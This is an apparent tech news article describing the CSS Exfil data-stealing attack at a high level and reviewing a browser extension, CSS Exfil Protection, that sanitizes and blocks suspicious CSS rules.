Protect yourself against a pure CSS data stealing attack called Exfil

CSS Exfil Protection is a browser extension for Mozilla Firefox and Google Chrome that protects data against CSS Exfil attacks.

An attack, named CSS Exfil (from exfiltrate), uses CSS to steal data. Mike Gualtieri, the researcher who discovered the vulnerability, published several proof of concept attacks designed to steal usernames, passwords, and other data on web pages it is used on.

css exfil vulnerability tester

Mike Gualtieri created a vulnerability tester that returns whether the web browser is vulnerable to CSS Exfil attacks. Just visit the web page in question to see if the browser is vulnerable or not. The page is just testing the vulnerability but not abusing it in any way.

CSS Exfil Protection is a browser extension that adds protections against CSS Exfil attacks to web browsers. Designed for Firefox and Chrome, the extension should work in Firefox-based or Chrome-based web browsers such as Opera or Vivaldi as well.

The extension "sanitizes and blocks any CSS rules which may be designed to steal data". Note that you may run into issues on sites that use these rules for legitimate purposes. The developer plans to introduce support for a whitelist in future versions to address the issue. An option to toggle it on or off globally is provided already.

Just install the extension in a supported web browser to protect your data against attacks exploiting the issue. You may want to visit the vulnerability tester page again to see if you are indeed protected.

css exfil protection

CSS Exfil Protection adds an icon to the browser's main toolbar. The icon shows the number of blocked CSS rules to indicate that content was blocked on the page; this does not necessarily mean that the page was used in an attack as the CSS rules may be used for legitimate purposes as well.

CSS Exfil Protection is open source. You can browse the code on the project's GitHub page.

Closing Words

The CSS Exfil Vulnerability highlights once again that there is always a chance that new technology that is supported by browsers can be abused.

Summary

software image

Author Rating

1star1star1star1stargray

4 based on 6 votes

Software Name

CSS Exfil Protection

Software Category

Browser

Landing Page

https://github.com/mlgualtieri/CSS-Exfil-Protection

Advertisement

Similar Articles:

Guess What: Ad Blockers Don't Block Ads That Well

Guess What: Ad Blockers Don't Block Ads That Well

The best secure browsers 2019

The best secure browsers 2019

Google Chrome extension that steals card numbers still available on Web Store

Google Chrome extension that steals card numbers still available on Web Store

Librefox: Firefox with privacy enhancements

Librefox: Firefox with privacy enhancements